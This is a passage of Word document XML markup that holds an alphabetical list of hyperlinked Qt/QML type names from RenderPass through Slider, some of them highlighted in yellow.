              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderPass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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderSettings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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderState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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderSurfaceSelector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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderTarget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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderTargetOutput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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderTargetSelector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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Repeater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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ReviewModel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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Rotation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42" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RotationAnimation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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RotationAnimator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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RotationReading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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RotationSensor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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RoundButton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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Route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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RouteManeuver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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RouteModel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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RouteQuery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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RouteSegment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252" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Row</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253" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RowLayout</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1180" w:name="s"/>
            <w:bookmarkEnd w:id="1180"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>S</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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Scale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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScaleAnimator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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Scatter3D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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Scatter3DSeries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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScatterDataProxy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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScatterSeries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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Scene3D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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SceneLoader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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScissorTest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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Screen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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScriptAction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265" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScrollBar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266" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScrollIndicator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267" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScrollView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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ScrollViewStyle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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SeamlessCubemap</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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SelectionListItem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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SelectionListModel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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Sensor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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SensorGesture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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SensorGlobal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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SensorReading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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SequentialAnimation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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Settings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78" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ShaderEffect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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ShaderEffectSource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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ShaderProgram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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Shape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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ShellSurfaceItem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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ShiftHandler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84" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ShiftKey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85" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Shortcut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86" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SignalSpy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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SignalTransition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88" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>size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289" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Slider: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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
